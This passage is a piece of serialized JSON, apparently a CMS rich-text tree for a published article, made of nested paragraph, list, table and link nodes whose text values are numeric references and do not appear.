22722],{"data":22723,"marks":22724,"value":17893,"nodeType":883},{},[],{"data":22726,"content":22727,"nodeType":8752},{},[22728,22741,22750,22759],{"data":22729,"content":22730,"nodeType":8766},{},[22731],{"data":22732,"content":22733,"nodeType":879},{},[22734,22738],{"data":22735,"marks":22736,"value":17907,"nodeType":883},{},[22737],{"type":916},{"data":22739,"marks":22740,"value":17911,"nodeType":883},{},[],{"data":22742,"content":22743,"nodeType":8766},{},[22744],{"data":22745,"content":22746,"nodeType":879},{},[22747],{"data":22748,"marks":22749,"value":17921,"nodeType":883},{},[],{"data":22751,"content":22752,"nodeType":8766},{},[22753],{"data":22754,"content":22755,"nodeType":879},{},[22756],{"data":22757,"marks":22758,"value":17931,"nodeType":883},{},[],{"data":22760,"content":22761,"nodeType":8766},{},[22762],{"data":22763,"content":22764,"nodeType":879},{},[22765],{"data":22766,"marks":22767,"value":17941,"nodeType":883},{},[],{"data":22769,"content":22770,"nodeType":8752},{},[22771,22784,22793,22802],{"data":22772,"content":22773,"nodeType":8766},{},[22774],{"data":22775,"content":22776,"nodeType":879},{},[22777,22781],{"data":22778,"marks":22779,"value":17955,"nodeType":883},{},[22780],{"type":916},{"data":22782,"marks":22783,"value":17959,"nodeType":883},{},[],{"data":22785,"content":22786,"nodeType":8766},{},[22787],{"data":22788,"content":22789,"nodeType":879},{},[22790],{"data":22791,"marks":22792,"value":17818,"nodeType":883},{},[],{"data":22794,"content":22795,"nodeType":8766},{},[22796],{"data":22797,"content":22798,"nodeType":879},{},[22799],{"data":22800,"marks":22801,"value":17978,"nodeType":883},{},[],{"data":22803,"content":22804,"nodeType":8766},{},[22805],{"data":22806,"content":22807,"nodeType":879},{},[22808],{"data":22809,"marks":22810,"value":17988,"nodeType":883},{},[],{"data":22812,"content":22813,"nodeType":879},{},[22814],{"data":22815,"marks":22816,"value":21,"nodeType":883},{},[],{"items":22818},[22819,22821],{"sys":22820,"name":3273},{"id":3272},{"sys":22822,"name":343},{"id":3276},{"items":22824},[22825],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":22826},{"url":872},{"__typename":1967,"sys":22828,"content":22829,"title":12628,"synopsis":12629,"hashTags":59,"publishedDate":12630,"slug":12631,"tagsCollection":24536,"authorsCollection":24542},{"id":10731},{"json":22830},{"data":22831,"content":22832,"nodeType":875},{},[22833,22839,22863,22873,22879,22884,22894,22899,22902,22909,22915,22970,22976,22981,22984,22991,22997,23002,23009,23015,23123,23128,23133,23139,23144,23151,23157,23163,23218,23224,23229,23234,23241,23247,23253,23260,23266,23295,23301,23306,23312,23354,23360,23367,23373,23378,23384,23390,23395,23401,23430,23436,23441,23444,23451,23457,23463,23469,23474,23480,23486,23491,23497,23502,23508,23513,23519,23525,23528,23535,23548,23554,23570,23791,23797,23823,24044,24050,24056,24247,24253,24432,24435,24442,24448,24454,24464,24467,24474,24489,24504,24511,24514,24521],{"data":22834,"content":22835,"nodeType":879},{},[22836],{"data":22837,"marks":22838,"value":10742,"nodeType":883},{},[],{"data":22840,"content":22841,"nodeType":879},{},[22842,22845,22851,22854,22860],{"data":22843,"marks":22844,"value":10749,"nodeType":883},{},[],{"data":22846,"content":22847,"nodeType":940},{"uri":7639},[22848],{"data":22849,"marks":22850,"value":3504,"nodeType":883},{},[],{"data":22852,"marks":22853,"value":10759,"nodeType":883},{},[],{"data":22855,"content":22856,"nodeType":940},{"uri":10762},[22857],{"data":22858,"marks":22859,"value":10767,"nodeType":883},{},[],{"data":22861,"marks":22862,"value":10771,"nodeType":883},{},[],{"data":22864,"content":22865,"nodeType":879},{},[22866,22870],{"data":22867,"marks":22868,"value":10779,"nodeType":883},{},[22869],{"type":916},{"data":22871,"marks":22872,"value":951,"nodeType":883},{},[],{"data":22874,"content":22875,"nodeType":879},{},[22876],{"data":22877,"marks":22878,"value":10789,"nodeType":883},{},[],{"data":22880,"content":22883,"nodeType":971},{"target":22881},{"sys":22882},{"id":10794,"type":976,"linkType":977},[],{"data":22885,"content":22886,"nodeType":879},{},[22887,22890],{"data":22888,"marks":22889,"value":10802,"nodeType":883},{},[],{"data":22891,"marks":22892,"value":10807,"nodeType":883},{},[22893],{"type":916},{"data":22895,"content":22898,"nodeType":971},{"target":22896},{"sys":22897},{"id":10812,"type":976,"linkType":977},[],{"data":22900,"content":22901,"nodeType":905},{},[],{"data":22903,"content":22904,"nodeType":909},{},[22905],{"data":22906,"marks":22907,"value":10824,"nodeType":883},{},[22908],{"type":916},{"data":22910,"content":22911,"nodeType":879},{},[22912],{"data":22913,"marks":22914,"value":10831,"nodeType":883},{},[],{"data":22916,"content":22917,"nodeType":1531},{},[22918,22931,22944,22957],{"data":22919,"content":22920,"nodeType":1535},{},[22921],{"data":22922,"content":22923,"nodeType":879},{},[22924,22928],{"data":22925,"marks":22926,"value":10845,"nodeType":883},{},[22927],{"type":916},{"data":22929,"marks":22930,"value":10849,"nodeType":883},{},[],{"data":22932,"content":22933,"nodeType":1535},{},[22934],{"data":22935,"content":22936,"nodeType":879},{},[22937,22941],{"data":22938,"marks":22939,"value":10860,"nodeType":883},{},[22940],{"type":916},{"data":22942,"marks":22943,"value":10864,"nodeType":883},{},[],{"data":22945,"content":22946,"nodeType":1535},{},[22947],{"data":22948,"content":22949,"nodeType":879},{},[22950,22954],{"data":22951,"marks":22952,"value":10875,"nodeType":883},{},[22953],{"type":916},{"data":22955,"marks":22956,"value":10879,"nodeType":883},{},[],{"data":22958,"content":22959,"nodeType":1535},{},[22960],{"data":22961,"content":22962,"nodeType":879},{},[22963,22967],{"data":22964,"marks":22965,"value":10890,"nodeType":883},{},[22966],{"type":916},{"data":22968,"marks":22969,"value":10894,"nodeType":883},{},[],{"data":22971,"content":22972,"nodeType":879},{},[22973],{"data":22974,"marks":22975,"value":10901,"nodeType":883},{},[],{"data":22977,"content":22980,"nodeType":971},{"target":22978},{"sys":22979},{"id":10906,"type":976,"linkType":977},[],{"data":22982,"content":22983,"nodeType":905},{},[],{"data":22985,"content":22986,"nodeType":909},{},[22987],{"data":22988,"marks":22989,"value":10918,"nodeType":883},{},[22990],{"type":916},{"data":22992,"content":22993,"nodeType":879},{},[22994],{"data":22995,"marks":22996,"value":10925,"nodeType":883},{},[],{"data":22998,"content":23001,"nodeType":971},{"target":22999},{"sys":23000},{"id":10930,"type":976,"linkType":977},[],{"data":23003,"content":23004,"nodeType":1036},{},[23005],{"data":23006,"marks":23007,"value":10939,"nodeType":883},{},[23008],{"type":916},{"data":23010,"content":23011,"nodeType":879},{},[23012],{"data":23013,"marks":23014,"value":10946,"nodeType":883},{},[],{"data":23016,"content":23017,"nodeType":1531},{},[23018,23031,23044,23064,23077,23090,23110],{"data":23019,"content":23020,"nodeType":1535},{},[23021],{"data":23022,"content":23023,"nodeType":879},{},[23024,23028],{"data":23025,"marks":23026,"value":10960,"nodeType":883},{},[23027],{"type":916},{"data":23029,"marks":23030,"value":10964,"nodeType":883},{},[],{"data":23032,"content":23033,"nodeType":1535},{},[23034],{"data":23035,"content":23036,"nodeType":879},{},[23037,23041],{"data":23038,"marks":23039,"value":10975,"nodeType":883},{},[23040],{"type":916},{"data":23042,"marks":23043,"value":10979,"nodeType":883},{},[],{"data":23045,"content":23046,"nodeType":1535},{},[23047],{"data":23048,"content":23049,"nodeType":879},{},[23050,23054,23057,23061],{"data":23051,"marks":23052,"value":10990,"nodeType":883},{},[23053],{"type":916},{"data":23055,"marks":23056,"value":10994,"nodeType":883},{},[],{"data":23058,"marks":23059,"value":10999,"nodeType":883},{},[23060],{"type":916},{"data":23062,"marks":23063,"value":11003,"nodeType":883},{},[],{"data":23065,"content":23066,"nodeType":1535},{},[23067],{"data":23068,"content":23069,"nodeType":879},{},[23070,23074],{"data":23071,"marks":23072,"value":11014,"nodeType":883},{},[23073],{"type":916},{"data":23075,"marks":23076,"value":11018,"nodeType":883},{},[],{"data":23078,"content":23079,"nodeType":1535},{},[23080],{"data":23081,"content":23082,"nodeType":879},{},[23083,23087],{"data":23084,"marks":23085,"value":11029,"nodeType":883},{},[23086],{"type":916},{"data":23088,"marks":23089,"value":11033,"nodeType":883},{},[],{"data":23091,"content":23092,"nodeType":1535},{},[23093],{"data":23094,"content":23095,"nodeType":879},{},[23096,23100,23103,23107],{"data":23097,"marks":23098,"value":11044,"nodeType":883},{},[23099],{"type":916},{"data":23101,"marks":23102,"value":11048,"nodeType":883},{},[],{"data":23104,"marks":23105,"value":11053,"nodeType":883},{},[23106],{"type":916},{"data":23108,"marks":23109,"value":11057,"nodeType":883},{},[],{"data":23111,"content":23112,"nodeType":1535},{},[23113],{"data":23114,"content":23115,"nodeType":879},{},[23116,23120],{"data":23117,"marks":23118,"value":11068,"nodeType":883},{},[23119],{"type":916},{"data":23121,"marks":23122,"value":11072,"nodeType":883},{},[],{"data":23124,"content":23127,"nodeType":971},{"target":23125},{"sys":23126},{"id":11077,"type":976,"linkType":977},[],{"data":23129,"content":23132,"nodeType":971},{"target":23130},{"sys":23131},{"id":11083,"type":976,"linkType":977},[],{"data":23134,"content":23135,"nodeType":879},{},[23136],{"data":23137,"marks":23138,"value":21,"nodeType":883},{},[],{"data":23140,"content":23143,"nodeType":971},{"target":23141},{"sys":23142},{"id":11095,"type":976,"linkType":977},[],{"data":23145,"content":23146,"nodeType":1036},{},[23147],{"data":23148,"marks":23149,"value":11104,"nodeType":883},{},[23150],{"type":916},{"data":23152,"content":23153,"nodeType":879},{},[23154],{"data":23155,"marks":23156,"value":11111,"nodeType":883},{},[],{"data":23158,"content":23159,"nodeType":879},{},[23160],{"data":23161,"marks":23162,"value":11118,"nodeType":883},{},[],{"data":23164,"content":23165,"nodeType":1531},{},[23166,23179,23192,23205],{"data":23167,"content":23168,"nodeType":1535},{},[23169],{"data":23170,"content":23171,"nodeType":879},{},[23172,23176],{"data":23173,"marks":23174,"value":11132,"nodeType":883},{},[23175],{"type":916},{"data":23177,"marks":23178,"value":11136,"nodeType":883},{},[],{"data":23180,"content":23181,"nodeType":1535},{},[23182],{"data":23183,"content":23184,"nodeType":879},{},[23185,23189],{"data":23186,"marks":23187,"value":11147,"nodeType":883},{},[23188],{"type":916},{"data":23190,"marks":23191,"value":11151,"nodeType":883},{},[],{"data":23193,"content":23194,"nodeType":1535},{},[23195],{"data":23196,"content":23197,"nodeType":879},{},[23198,23202],{"data":23199,"marks":23200,"value":11162,"nodeType":883},{},[23201],{"type":916},{"data":23203,"marks":23204,"value":11166,"nodeType":883},{},[],{"data":23206,"content":23207,"nodeType":1535},{},[23208],{"data":23209,"content":23210,"nodeType":879},{},[23211,23215],{"data":23212,"marks":23213,"value":11177,"nodeType":883},{},[23214],{"type":916},{"data":23216,"marks":23217,"value":11181,"nodeType":883},{},[],{"data":23219,"content":23220,"nodeType":879},{},[23221],{"data":23222,"marks":23223,"value":11188,"nodeType":883},{},[],{"data":23225,"content":23228,"nodeType":971},{"target":23226},{"sys":23227},{"id":11193,"type":976,"linkType":977},[],{"data":23230,"content":23233,"nodeType":971},{"target":23231},{"sys":23232},{"id":11199,"type":976,"linkType":977},[],{"data":23235,"content":23236,"nodeType":1036},{},[23237],{"data":23238,"marks":23239,"value":11208,"nodeType":883},{},[23240],{"type":916},{"data":23242,"content":23243,"nodeType":879},{},[23244],{"data":23245,"marks":23246,"value":11215,"nodeType":883},{},[],{"data":23248,"content":23249,"nodeType":879},{},[23250],{"data":23251,"marks":23252,"value":11222,"nodeType":883},{},[],{"data":23254,"content":23255,"nodeType":1036},{},[23256],{"data":23257,"marks":23258,"value":11230,"nodeType":883},{},[23259],{"type":916},{"data":23261,"content":23262,"nodeType":879},{},[23263],{"data":23264,"marks":23265,"value":11237,"nodeType":883},{},[],{"data":23267,"content":23268,"nodeType":1531},{},[23269,23282],{"data":23270,"content":23271,"nodeType":1535},{},[23272],{"data":23273,"content":23274,"nodeType":879},{},[23275,23279],{"data":23276,"marks":23277,"value":11251,"nodeType":883},{},[23278],{"type":916},{"data":23280,"marks":23281,"value":11255,"nodeType":883},{},[],{"data":23283,"content":23284,"nodeType":1535},{},[23285],{"data":23286,"content":23287,"nodeType":879},{},[23288,23292],{"data":23289,"marks":23290,"value":11266,"nodeType":883},{},[23291],{"type":916},{"data":23293,"marks":23294,"value":11270,"nodeType":883},{},[],{"data":23296,"content":23297,"nodeType":879},{},[23298],{"data":23299,"marks":23300,"value":11277,"nodeType":883},{},[],{"data":23302,"content":23305,"nodeType":971},{"target":23303},{"sys":23304},{"id":11282,"type":976,"linkType":977},[],{"data":23307,"content":23308,"nodeType":879},{},[23309],{"data":23310,"marks":23311,"value":11290,"nodeType":883},{},[],{"data":23313,"content":23314,"nodeType":1531},{},[23315,23328,23341],{"data":23316,"content":23317,"nodeType":1535},{},[23318],{"data":23319,"content":23320,"nodeType":879},{},[23321,23325],{"data":23322,"marks":23323,"value":11304,"nodeType":883},{},[23324],{"type":916},{"data":23326,"marks":23327,"value":11308,"nodeType":883},{},[],{"data":23329,"content":23330,"nodeType":1535},{},[23331],{"data":23332,"content":23333,"nodeType":879},{},[23334,23338],{"data":23335,"marks":23336,"value":11319,"nodeType":883},{},[23337],{"type":916},{"data":23339,"marks":23340,"value":11323,"nodeType":883},{},[],{"data":23342,"content":23343,"nodeType":1535},{},[23344],{"data":23345,"content":23346,"nodeType":879},{},[23347,23351],{"data":23348,"marks":23349,"value":11334,"nodeType":883},{},[23350],{"type":916},{"data":23352,"marks":23353,"value":11338,"nodeType":883},{},[],{"data":23355,"content":23356,"nodeType":879},{},[23357],{"data":23358,"marks":23359,"value":11345,"nodeType":883},{},[],{"data":23361,"content":23362,"nodeType":1036},{},[23363],{"data":23364,"marks":23365,"value":11353,"nodeType":883},{},[23366],{"type":916},{"data":23368,"content":23369,"nodeType":879},{},[23370],{"data":23371,"marks":23372,"value":11360,"nodeType":883},{},[],{"data":23374,"content":23377,"nodeType":971},{"target":23375},{"sys":23376},{"id":11365,"type":976,"linkType":977},[],{"data":23379,"content":23380,"nodeType":879},{},[23381],{"data":23382,"marks":23383,"value":11373,"nodeType":883},{},[],{"data":23385,"content":23386,"nodeType":879},{},[23387],{"data":23388,"marks":23389,"value":11380,"nodeType":883},{},[],{"data":23391,"content":23394,"nodeType":971},{"target":23392},{"sys":23393},{"id":11385,"type":976,"linkType":977},[],{"data":23396,"content":23397,"nodeType":879},{},[23398],{"data":23399,"marks":23400,"value":11393,"nodeType":883},{},[],{"data":23402,"content":23403,"nodeType":1531},{},[23404,23417],{"data":23405,"content":23406,"nodeType":1535},{},[23407],{"data":23408,"content":23409,"nodeType":879},{},[23410,23414],{"data":23411,"marks":23412,"value":11407,"nodeType":883},{},[23413],{"type":916},{"data":23415,"marks":23416,"value":11411,"nodeType":883},{},[],{"data":23418,"content":23419,"nodeType":1535},{},[23420],{"data":23421,"content":23422,"nodeType":879},{},[23423,23427],{"data":23424,"marks":23425,"value":11422,"nodeType":883},{},[23426],{"type":916},{"data":23428,"marks":23429,"value":11426,"nodeType":883},{},[],{"data":23431,"content":23432,"nodeType":879},{},[23433],{"data":23434,"marks":23435,"value":11433,"nodeType":883},{},[],{"data":23437,"content":23440,"nodeType":971},{"target":23438},{"sys":23439},{"id":11438,"type":976,"linkType":977},[],{"data":23442,"content":23443,"nodeType":905},{},[],{"data":23445,"content":23446,"nodeType":909},{},[23447],{"data":23448,"marks":23449,"value":11450,"nodeType":883},{},[23450],{"type":916},{"data":23452,"content":23453,"nodeType":879},{},[23454],{"data":23455,"marks":23456,"value":11457,"nodeType":883},{},[],{"data":23458,"content":23459,"nodeType":879},{},[23460],{"data":23461,"marks":23462,"value":11464,"nodeType":883},{},[],{"data":23464,"content":23465,"nodeType":879},{},[23466],{"data":23467,"marks":23468,"value":11471,"nodeType":883},{},[],{"data":23470,"content":23473,"nodeType":971},{"target":23471},{"sys":23472},{"id":2966,"type":976,"linkType":977},[],{"data":23475,"content":23476,"nodeType":879},{},[23477],{"data":23478,"marks":23479,"value":11483,"nodeType":883},{},[],{"data":23481,"content":23482,"nodeType":879},{},[23483],{"data":23484,"marks":23485,"value":11490,"nodeType":883},{},[],{"data":23487,"content":23490,"nodeType":971},{"target":23488},{"sys":23489},{"id":11495,"type":976,"linkType":977},[],{"data":23492,"content":23493,"nodeType":879},{},[23494],{"data":23495,"marks":23496,"value":11503,"nodeType":883},{},[],{"data":23498,"content":23501,"nodeType":971},{"target":23499},{"sys":23500},{"id":11508,"type":976,"linkType":977},[],{"data":23503,"content":23504,"nodeType":879},{},[23505],{"data":23506,"marks":23507,"value":11516,"nodeType":883},{},[],{"data":23509,"content":23512,"nodeType":971},{"target":23510},{"sys":23511},{"id":11521,"type":976,"linkType":977},[],{"data":23514,"content":23515,"nodeType":879},{},[23516],{"data":23517,"marks":23518,"value":11529,"nodeType":883},{},[],{"data":23520,"content":23521,"nodeType":879},{},[23522],{"data":23523,"marks":23524,"value":11536,"nodeType":883},{},[],{"data":23526,"content":23527,"nodeType":905},{},[],{"data":23529,"content":23530,"nodeType":909},{},[23531],{"data":23532,"marks":23533,"value":11547,"nodeType":883},{},[23534],{"type":916},{"data":23536,"content":23537,"nodeType":879},{},[23538,23541,23545],{"data":23539,"marks":23540,"value":11554,"nodeType":883},{},[],{"data":23542,"marks":23543,"value":11559,"nodeType":883},{},[23544],{"type":916},{"data":23546,"marks":23547,"value":11563,"nodeType":883},{},[],{"data":23549,"content":23550,"nodeType":1036},{},[23551],{"data":23552,"marks":23553,"value":11570,"nodeType":883},{},[],{"data":23555,"content":23556,"nodeType":879},{},[23557,23560,23567],{"data":23558,"marks":23559,"value":11577,"nodeType":883},{},[],{"data":23561,"content":23562,"nodeType":940},{"uri":2100},[23563],{"data":23564,"marks":23565,"value":11585,"nodeType":883},{},[23566],{"type":948},{"data":23568,"marks":23569,"value":11589,"nodeType":883},{},[],{"data":23571,"content":23572,"nodeType":8845},{},[23573,23596,23623,23644,23689,23728,23749,23770],{"data":23574,"content":23575,"nodeType":8752},{},[23576,23586],{"data":23577,"content":23578,"nodeType":8766},{},[23579],{"data":23580,"content":23581,"nodeType":879},{},[23582],{"data":23583,"marks":23584,"value":11606,"nodeType":883},{},[23585],{"type":916},{"data":23587,"content":23588,"nodeType":8766},{},[23589],{"data":23590,"content":23591,"nodeType":879},{},[23592],{"data":23593,"marks":23594,"value":11104,"nodeType":883},{},[23595],{"type":916},{"data":23597,"content":23598,"nodeType":8752},{},[23599,23608],{"data":23600,"content":23601,"nodeType":8766},{},[23602],{"data":23603,"content":23604,"nodeType":879},{},[23605],{"data":23606,"marks":23607,"value":11132,"nodeType":883},{},[],{"data":23609,"content":23610,"nodeType":8766},{},[23611,23617],{"data":23612,"content":23613,"nodeType":879},{},[23614],{"data":23615,"marks":23616,"value":11638,"nodeType":883},{},[],{"data":23618,"content":23619,"nodeType":879},{},[23620],{"data":23621,"marks":23622,"value":11645,"nodeType":883},{},[],{"data":23624,"content":23625,"nodeType":8752},{},[23626,23635],{"data":23627,"content":23628,"nodeType":8766},{},[23629],{"data":23630,"content":23631,"nodeType":879},{},[23632],{"data":23633,"marks":23634,"value":11658,"nodeType":883},{},[],{"data":23636,"content":23637,"nodeType":8766},{},[23638],{"data":23639,"content":23640,"nodeType":879},{},[23641],{"data":23642,"marks":23643,"value":11668,"nodeType":883},{},[],{"data":23645,"content":23646,"nodeType":8752},{},[23647,23656],{"data":23648,"content":23649,"nodeType":8766},{},[23650],{"data":23651,"content":23652,"nodeType":879},{},[23653],{"data":23654,"marks":23655,"value":11681,"nodeType":883},{},[],{"data":23657,"content":23658,"nodeType":8766},{},[23659,23665,23671,23677,23683],{"data":23660,"content":23661,"nodeType":879},{},[23662],{"data":23663,"marks":23664,"value":11691,"nodeType":883},{},[],{"data":23666,"content":23667,"nodeType":879},{},[23668],{"data":23669,"marks":23670,"value":11698,"nodeType":883},{},[],{"data":23672,"content":23673,"nodeType":879},{},[23674],{"data":23675,"marks":23676,"value":11705,"nodeType":883},{},[],{"data":23678,"content":23679,"nodeType":879},{},[23680],{"data":23681,"marks":23682,"value":11712,"nodeType":883},{},[],{"data":23684,"content":23685,"nodeType":879},{},[23686],{"data":23687,"marks":23688,"value":11719,"nodeType":883},{},[],{"data":23690,"content":23691,"nodeType":8752},{},[23692,23701],{"data":23693,"content":23694,"nodeType":8766},{},[23695],{"data":23696,"content":23697,"nodeType":879},{},[23698],{"data":23699,"marks":23700,"value":11732,"nodeType":883},{},[],{"data":23702,"content":23703,"nodeType":8766},{},[23704,23710,23716,23722],{"data":23705,"content":23706,"nodeType":879},{},[23707],{"data":23708,"marks":23709,"value":11742,"nodeType":883},{},[],{"data":23711,"content":23712,"nodeType":879},{},[23713],{"data":23714,"marks":23715,"value":11749,"nodeType":883},{},[],{"data":23717,"content":23718,"nodeType":879},{},[23719],{"data":23720,"marks":23721,"value":11756,"nodeType":883},{},[],{"data":23723,"content":23724,"nodeType":879},{},[23725],{"data":23726,"marks":23727,"value":11763,"nodeType":883},{},[],{"data":23729,"content":23730,"nodeType":8752},{},[23731,23740],{"data":23732,"content":23733,"nodeType":8766},{},[23734],{"data":23735,"content":23736,"nodeType":879},{},[23737],{"data":23738,"marks":23739,"value":11776,"nodeType":883},{},[],{"data":23741,"content":23742,"nodeType":8766},{},[23743],{"data":23744,"content":23745,"nodeType":879},{},[23746],{"data":23747,"marks":23748,"value":11786,"nodeType":883},{},[],{"data":23750,"content":23751,"nodeType":8752},{},[23752,23761],{"data":23753,"content":23754,"nodeType":8766},{},[23755],{"data":23756,"content":23757,"nodeType":879},{},[23758],{"data":23759,"marks":23760,"value":11799,"nodeType":883},{},[],{"data":23762,"content":23763,"nodeType":8766},{},[23764],{"data":23765,"content":23766,"nodeType":879},{},[23767],{"data":23768,"marks":23769,"value":11809,"nodeType":883},{},[],{"data":23771,"content":23772,"nodeType":8752},{},[23773,23782],{"data":23774,"content":23775,"nodeType":8766},{},[23776],{"data":23777,"content":23778,"nodeType":879},{},[23779],{"data":23780,"marks":23781,"value":11822,"nodeType":883},{},[],{"data":23783,"content":23784,"nodeType":8766},{},[23785],{"data":23786,"content":23787,"nodeType":879},{},[23788],{"data":23789,"marks":23790,"value":11832,"nodeType":883},{},[],{"data":23792,"content":23793,"nodeType":1036},{},[23794],{"data":23795,"marks":23796,"value":11839,"nodeType":883},{},[],{"data":23798,"content":23799,"nodeType":879},{},[23800,23803,23810,23813,23820],{"data":23801,"marks":23802,"value":11846,"nodeType":883},{},[],{"data":23804,"content":23805,"nodeType":940},{"uri":2100},[23806],{"data":23807,"marks":23808,"value":11854,"nodeType":883},{},[23809],{"type":948},{"data":23811,"marks":23812,"value":6141,"nodeType":883},{},[],{"data":23814,"content":23815,"nodeType":940},{"uri":11860},[23816],{"data":23817,"marks":23818,"value":11866,"nodeType":883},{},[23819],{"type":948},{"data":23821,"marks":23822,"value":11870,"nodeType":883},{},[],{"data":23824,"content":23825,"nodeType":8845},{},[23826,23849,23888,23909,23942,23981,24002,24023],{"data":23827,"content":23828,"nodeType":8752},{},[23829,23839],{"data":23830,"content":23831,"nodeType":8766},{},[23832],{"data":23833,"content":23834,"nodeType":879},{},[23835],{"data":23836,"marks":23837,"value":11606,"nodeType":883},{},[23838],{"type":916},{"data":23840,"content":23841,"nodeType":8766},{},[23842],{"data":23843,"content":23844,"nodeType":879},{},[23845],{"data":23846,"marks":23847,"value":11230,"nodeType":883},{},[23848],{"type":916},{"data":23850,"content":23851,"nodeType":8752},{},[23852,23861],{"data":23853,"content":23854,"nodeType":8766},{},[23855],{"data":23856,"content":23857,"nodeType":879},{},[23858],{"data":23859,"marks":23860,"value":11132,"nodeType":883},{},[],{"data":23862,"content":23863,"nodeType":8766},{},[23864,23870,23876,23882],{"data":23865,"content":23866,"nodeType":879},{},[23867],{"data":23868,"marks":23869,"value":11918,"nodeType":883},{},[],{"data":23871,"content":23872,"nodeType":879},{},[23873],{"data":23874,"marks":23875,"value":11925,"nodeType":883},{},[],{"data":23877,"content":23878,"nodeType":879},{},[23879],{"data":23880,"marks":23881,"value":11932,"nodeType":883},{},[],{"data":23883,"content":23884,"nodeType":879},{},[23885],{"data":23886,"marks":23887,"value":11939,"nodeType":883},{},[],{"data":23889,"content":23890,"nodeType":8752},{},[23891,23900],{"data":23892,"content":23893,"nodeType":8766},{},[23894],{"data":23895,"content":23896,"nodeType":879},{},[23897],{"data":23898,"marks":23899,"value":11658,"nodeType":883},{},[],{"data":23901,"content":23902,"nodeType":8766},{},[23903],{"data":23904,"content":23905,"nodeType":879},{},[23906],{"data":23907,"marks":23908,"value":11961,"nodeType":883},{},[],{"data":23910,"content":23911,"nodeType":8752},{},[23912,23921],{"data":23913,"content":23914,"nodeType":8766},{},[23915],{"data":23916,"content":23917,"nodeType":879},{},[23918],{"data":23919,"marks":23920,"value":11681,"nodeType":883},{},[],{"data":23922,"content":23923,"nodeType":8766},{},[23924,23930,23936],{"data":23925,"content":23926,"nodeType":879},{},[23927],{"data":23928,"marks":23929,"value":11983,"nodeType":883},{},[],{"data":23931,"content":23932,"nodeType":879},{},[23933],{"data":23934,"marks":23935,"value":11990,"nodeType":883},{},[],{"data":23937,"content":23938,"nodeType":879},{},[23939],{"data":23940,"marks":23941,"value":11719,"nodeType":883},{},[],{"data":23943,"content":23944,"nodeType":8752},{},[23945,23954],{"data":23946,"content":23947,"nodeType":8766},{},[23948],{"data":23949,"content":23950,"nodeType":879},{},[23951],{"data":23952,"marks":23953,"value":11732,"nodeType":883},{},[],{"data":23955,"content":23956,"nodeType":8766},{},[23957,23963,23969,23975],{"data":23958,"content":23959,"nodeType":879},{},[23960],{"data":23961,"marks":23962,"value":12018,"nodeType":883},{},[],{"data":23964,"content":23965,"nodeType":879},{},[23966],{"data":23967,"marks":23968,"value":12025,"nodeType":883},{},[],{"data":23970,"content":23971,"nodeType":879},{},[23972],{"data":23973,"marks":23974,"value":12032,"nodeType":883},{},[],{"data":23976,"content":23977,"nodeType":879},{},[23978],{"data":23979,"marks":23980,"value":12039,"nodeType":883},{},[],{"data":23982,"content":23983,"nodeType":8752},{},[23984,23993],{"data":23985,"content":23986,"nodeType":8766},{},[23987],{"data":23988,"content":23989,"nodeType":879},{},[23990],{"data":23991,"marks":23992,"value":11776,"nodeType":883},{},[],{"data":23994,"content":23995,"nodeType":8766},{},[23996],{"data":23997,"content":23998,"nodeType":879},{},[23999],{"data":24000,"marks":24001,"value":12061,"nodeType":883},{},[],{"data":24003,"content":24004,"nodeType":8752},{},[24005,24014],{"data":24006,"content":24007,"nodeType":8766},{},[24008],{"data":24009,"content":24010,"nodeType":879},{},[24011],{"data":24012,"marks":24013,"value":11799,"nodeType":883},{},[],{"data":24015,"content":24016,"nodeType":8766},{},[24017],{"data":24018,"content":24019,"nodeType":879},{},[24020],{"data":24021,"marks":24022,"value":12083,"nodeType":883},{},[],{"data":24024,"content":24025,"nodeType":8752},{},[24026,24035],{"data":24027,"content":24028,"nodeType":8766},{},[24029],{"data":24030,"content":24031,"nodeType":879},{},[24032],{"data":24033,"marks":24034,"value":11822,"nodeType":883},{},[],{"data":24036,"content":24037,"nodeType":8766},{},[24038],{"data":24039,"content":24040,"nodeType":879},{},[24041],{"data":24042,"marks":24043,"value":12105,"nodeType":883},{},[],{"data":24045,"content":24046,"nodeType":1036},{},[24047],{"data":24048,"marks":24049,"value":12112,"nodeType":883},{},[],{"data":24051,"content":24052,"nodeType":879},{},[24053],{"data":24054,"marks":24055,"value":12119,"nodeType":883},{},[],{"data":24057,"content":24058,"nodeType":8845},{},[24059,24082,24103,24124,24145,24184,24205,24226],{"data":24060,"content":24061,"nodeType":8752},{},[24062,24072],{"data":24063,"content":24064,"nodeType":8766},{},[24065],{"data":24066,"content":24067,"nodeType":879},{},[24068],{"data":24069,"marks":24070,"value":11606,"nodeType":883},{},[24071],{"type":916},{"data":24073,"content":24074,"nodeType":8766},{},[24075],{"data":24076,"content":24077,"nodeType":879},{},[24078],{"data":24079,"marks":24080,"value":12146,"nodeType":883},{},[24081],{"type":916},{"data":24083,"content":24084,"nodeType":8752},{},[24085,24094],{"data":24086,"content":24087,"nodeType":8766},{},[24088],{"data":24089,"content":24090,"nodeType":879},{},[24091],{"data":24092,"marks":24093,"value":11132,"nodeType":883},{},[],{"data":24095,"content":24096,"nodeType":8766},{},[24097],{"data":24098,"content":24099,"nodeType":879},{},[24100],{"data":24101,"marks":24102,"value":12168,"nodeType":883},{},[],{"data":24104,"content":24105,"nodeType":8752},{},[24106,24115],{"data":24107,"content":24108,"nodeType":8766},{},[24109],{"data":24110,"content":24111,"nodeType":879},{},[24112],{"data":24113,"marks":24114,"value":11658,"nodeType":883},{},[],{"data":24116,"content":24117,"nodeType":8766},{},[24118],{"data":24119,"content":24120,"nodeType":879},{},[24121],{"data":24122,"marks":24123,"value":12190,"nodeType":883},{},[],{"data":24125,"content":24126,"nodeType":8752},{},[24127,24136],{"data":24128,"content":24129,"nodeType":8766},{},[24130],{"data":24131,"content":24132,"nodeType":879},{},[24133],{"data":24134,"marks":24135,"value":11681,"nodeType":883},{},[],{"data":24137,"content":24138,"nodeType":8766},{},[24139],{"data":24140,"content":24141,"nodeType":879},{},[24142],{"data":24143,"marks":24144,"value":12212,"nodeType":883},{},[],{"data":24146,"content":24147,"nodeType":8752},{},[24148,24157],{"data":24149,"content":24150,"nodeType":8766},{},[24151],{"data":24152,"content":24153,"nodeType":879},{},[24154],{"data":24155,"marks":24156,"value":11732,"nodeType":883},{},[],{"data":24158,"content":24159,"nodeType":8766},{},[24160,24166,24172,24178],{"data":24161,"content":24162,"nodeType":879},{},[24163],{"data":24164,"marks":24165,"value":12234,"nodeType":883},{},[],{"data":24167,"content":24168,"nodeType":879},{},[24169],{"data":24170,"marks":24171,"value":12241,"nodeType":883},{},[],{"data":24173,"